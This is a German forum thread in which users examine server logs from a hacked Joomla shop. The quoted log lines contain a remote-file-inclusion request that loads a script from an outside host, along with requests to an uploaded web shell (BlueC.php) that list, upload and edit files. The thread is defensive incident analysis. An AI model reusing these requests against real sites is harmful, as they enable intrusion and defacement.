Joomla 1.5.9 bzw. 1.5.10 GEHACKT!

**VollNormal** · 15.05.2009 08:49

Wieso beschuldigst du den Türken? Auffällig sind doch wohl eher diese drei Zeilen:

Code:

85.159.106.50 - - [10/Apr/2009:18:50:16 +0200] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 410 347 shop.whitehorseranch.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "-"
[...]
85.159.106.50 - - [10/Apr/2009:18:51:53 +0200] "GET /whr_shop//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 410 356 www.whitehorseranch.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "-"
85.159.106.50 - - [10/Apr/2009:18:51:54 +0200] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 410 347 www.whitehorseranch.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "-"

**msit** · 15.05.2009 09:02

Weil der auch noch seinen Senf auf den anderen Seiten hinterlassen hat:
By BeyazKurt | ALBANIAN C0der
und auch die beiden files rt.php und BlueC.php mittels POST übertragen hat.

Wobei obiger Auszug auch nicht ohne ist...

**VollNormal** · 15.05.2009 10:48

Der albanische Kurt (wenn er es denn ist, die whois-Antwort deutet darauf hin, dass die IP dynamisch vergeben wird) hat tatsächlich auch was versucht ...

Hiermit kann ich nichts anfangen, wäre mir aber verdächtig:

Code:

85.101.148.182 - - [10/Apr/2009:18:46:19 +0200] "GET /tinc?key=S9SR2slT HTTP/1.1" 200 1304 www.whitehorseranch.de "http://www.whitehorseranch.de/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"

Und so ein paar Sachen sind zwischendurch auch noch auffällig:

Code:

85.101.148.182 - - [10/Apr/2009:18:57:30 +0200] "GET /whr_shop/BlueC.php?act=upload&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates&sort=0a HTTP/1.1" 200 4068 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=ls&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fja_purity&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
[...]
85.101.148.182 - - [10/Apr/2009:18:57:52 +0200] "GET /whr_shop/BlueC.php?act=ls&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2F&sort=0a HTTP/1.1" 200 5007 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=upload&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
[...]
85.101.148.182 - - [10/Apr/2009:18:58:17 +0200] "POST /whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis%2F HTTP/1.1" 200 7109 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
[...]
85.101.148.182 - - [10/Apr/2009:18:58:38 +0200] "POST /whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis%2F HTTP/1.1" 200 7108 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis%2F" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"

Wobei - falls dieser Ansatz tatsächlich zum Erfolg geführt haben sollte, dann gehört den Programmierern der Erweiterungen gehörig auf die Finger geklopft. Weil sämtliche über das Netz eingehenden Daten sind grundsätzlich erstmal als verseucht anzunehmen.

**msit** · 15.05.2009 11:10

Der tinc?key verweist auf einen 1und1 internen shop.

Das andere sind besagte Angriffe auf das Joomla (whr_shop).
Fragt sich vorab nur, wie es ihm gelungen ist, die BlueC.php einzuschleusen ...

**flotte** · 15.05.2009 11:17

Das Log ist zu jung. Dort sind nur die Aktivitäten zu sehen, die NACH der Ausnutzung einer Lücke stattgefunden haben. Nicht selten wird auch einfach per FTP eine Shell hochgeladen. Prüfe daher auch die FTP-Logs (Passwörter hast Du ja hoffentlich schon alle geändert)

**msit** · 15.05.2009 11:34

Zitat von flotte

Das Log ist zu jung. Dort sind nur die Aktivitäten zu sehen, die NACH der Ausnutzung einer Lücke stattgefunden haben. Nicht selten wird auch einfach per FTP eine Shell hochgeladen. Prüfe daher auch die FTP-Logs (Passwörter hast Du ja hoffentlich schon alle geändert)

nur leider sind die Logs 15 und 16 nicht mehr auf dem Server 14(3.04.), 17 (24.04.) und 19 (8.05.) schon ..
Der Bursche hat sie wohl gelöscht ...

Passwörter sind nach deinem Hinweis sofort geändert worden!

Irgendeine Idee, wie ich den Login-Schirm vom Backend wieder herkriege?
Habe die System-Dateien von Joomla größtenteils von einer Sicherung zurückgespielt, kriege aber nur einen leeren Schirm.

Habe ihn wieder! War nur eine leere index.htm davor! Kartoffel auf den Augen!

**bluesky07** · 25.05.2009 00:19

Zitat von flotte

Das sind ziemlich uninteressante Informationen. Viel wichtiger ist ist: WIE wurde die Datei eingeschleust. Welche konkrete Lücke wurde in welcher Weise genutzt?

Würde mich auch interessieren, da meine *.php und *.html auch aus diesem Netz ausgetauscht wurden.

Bluesky

**flotte** · 25.05.2009 01:01

Was soll das Crossposting? Bleib bitte bei Deinem Thread.

Thema: Joomla 1.5.9 bzw. 1.5.10 GEHACKT!

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Guter Hinweis ...

Lesezeichen

Lesezeichen

Berechtigungen